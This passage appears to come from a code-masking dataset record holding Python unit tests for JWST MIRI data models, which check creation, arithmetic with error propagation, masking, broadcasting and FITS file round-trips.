3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct 
+ 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, 
expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 
0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n 
self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d 
= [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n 
self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 
0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = 
self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n\n def setUp(self):\n self.data = np.linspace(0.0, 100000.0, 64 * 64)\n self.data.shape = [64, 64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n self.simpleproduct.set_housekeeping_metadata('MIRI EC',\n 'Joe Bloggs', 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W', ccc_pos='OPEN', deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW', nints=1,\n ngroups=10, frame_time=30.0, integration_time=30.0, group_time=\n 300.0, reset_time=0, frame_resets=3)\n self.primary = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]\n ]\n self.error = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n self.quality = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary, err=self.\n error, dq=self.quality, dq_def=master_flags)\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile1 = 'MiriMeasuredModel_test1.fits'\n self.testfile2 = 'MiriMeasuredModel_test2.fits'\n self.tempfiles = [self.testfile1, self.testfile2]\n\n def tearDown(self):\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n for tempfile in self.tempfiles:\n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + tempfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n del self.tempfiles\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n 
\"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, 
descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n\n def test_content(self):\n 
self.assertTrue(np.allclose(self.primary, self.dataproduct.data))\n self.assertTrue(np.allclose(self.error, self.dataproduct.err))\n self.assertTrue(np.allclose(self.quality, self.dataproduct.dq))\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct 
+ 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, 
expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n\n def test_broadcasting(self):\n a4x3 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b4x3 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n a4x1 = [4, 3, 2, 1]\n b4x1 = [1, 2, 1, 2]\n c4x1 = [0, 1, 0, 0]\n c5x1 = [0, 1, 0, 0, 1]\n newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)\n self.assertTrue(np.allclose(a4x3, newdp1.data))\n self.assertTrue(np.allclose(b4x3, newdp1.err))\n self.assertTrue(np.allclose(c4x1, newdp1.dq))\n self.assertRaises(TypeError, MiriMeasuredModel, data=a4x3, error=\n b4x3, quality=c5x1)\n newdp2 = MiriMeasuredModel(data=a4x1, err=b4x1, dq=c4x1)\n result1 = newdp1 + newdp2\n result2 = newdp2 + newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.data, result2.data))\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del 
result1, result2\n result1 = newdp1 * newdp2\n result2 = newdp2 * newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.data, result2.data))\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n result1 = newdp1 - newdp2\n result2 = newdp2 - newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.err, result2.err))\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n result1 = newdp1 / newdp2\n result2 = newdp2 / newdp1\n self.assertEqual(result1.data.shape, result2.data.shape)\n self.assertTrue(np.allclose(result1.dq, result2.dq))\n result1.save(self.testfile1, overwrite=True)\n result2.save(self.testfile2, overwrite=True)\n del result1, result2\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n 